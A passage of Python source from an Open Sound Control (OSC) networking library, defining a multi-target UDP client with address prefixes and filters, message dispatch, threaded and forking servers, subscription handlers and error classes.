pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets', and sends each OSCMessage to each OSCTarget
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
the OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in list(self.targets.keys()):
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in list(src.keys()): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in list(src.items()):
if (addr in list(dst.keys())) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in list(self.targets.keys()):
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if isinstance(filters, str):
(_, filters) = parseFilterStr(filters)
elif type(filters) != dict:
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if type(address) == str:
address = self._searchHostAddr(address)
elif (type(address) == tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if type(address) == str:
address = self._searchHostAddr(address)
if type(address) == tuple:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if type(address) == str:
address = self._searchHostAddr(address)
if type(address) == tuple:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in list(self.targets.keys()):
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in list(self.targets.items()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if type(address) == str:
address = self._searchHostAddr(address)
if (type(address) == tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in list(self.targets.keys())):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in list(dict.items()):
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in list(self.targets.items()):
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifying remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = list(out.values())
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in list(filters.keys()):
if filters['/*']:
out = msg
else:
out = None
elif False in list(filters.values()):
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in list(filters.keys()):
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = list(out.values())
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in list(self.targets.items()):
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, msg)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error as e:
if e.errno in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return list(self.callbacks.keys())
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the received message
- tags (string): The OSC-typetags of the received message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in list(self.callbacks.keys()):
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
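# Illustrative sketch: registering a callback with an OSCAddressSpace and
# dispatching a decoded message to it. The handler signature matches the one
# described in the OSCServer handler docstrings further below.
def _example_address_space():
    space = OSCAddressSpace()
    def echo_handler(addr, tags, data, client_address):
        print("got", addr, data, "from", client_address)
        return None
    space.addMsgHandler("/print", echo_handler)
    # dispatchMessage(pattern, typetags-without-comma, data, client_address)
    space.dispatchMessage("/print", "si", ["hello", 1], ("127.0.0.1", 9000))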
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-addresses
that have been registered to the server with a callback-function.
If the address-pattern of the message matches the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.setServer(self)
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
# 'cmp' and '_sock' are gone in Python 3; compare the socket objects directly
return self.socket == other.socket
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix>' -> serverInfo_handler
- '<prefix><error_prefix>' -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it:
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt)
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in list(self.callbacks.keys()):
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retrieve <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == int) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) == str:
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retrieve <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == int) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) == str:
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError as e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
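# Illustrative sketch (port is a placeholder): running a ThreadingOSCServer
# (defined just below) in a background thread with the default handlers
# registered, then shutting it down.
def _example_run_server():
    server = ThreadingOSCServer(("127.0.0.1", 9000))
    server.addDefaultHandlers()
    thread = threading.Thread(target=server.serve_forever)
    thread.start()
    # ... send OSC messages to ("127.0.0.1", 9000) from any OSCClient ...
    server.running = False    # ask serve_forever() to exit; it wakes up after socket_timeout
    thread.join()
    server.close()            # closes the server socket and the associated client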
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# use the multi-threaded ThreadingOSCRequestHandler so bundled messages are dispatched concurrently
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# use the multi-threaded ThreadingOSCRequestHandler so bundled messages are dispatched concurrently
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
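# Illustrative sketch of the length-prefixed framing described above: each OSC
# packet sent over a stream transport is preceded by its size as a big-endian
# int32 (the helpers below are examples, not used by the classes that follow).
def _example_frame_packet(binary_packet):
    """Returns the given packet bytes prefixed with their 4-byte length."""
    return struct.pack(">L", len(binary_packet)) + binary_packet

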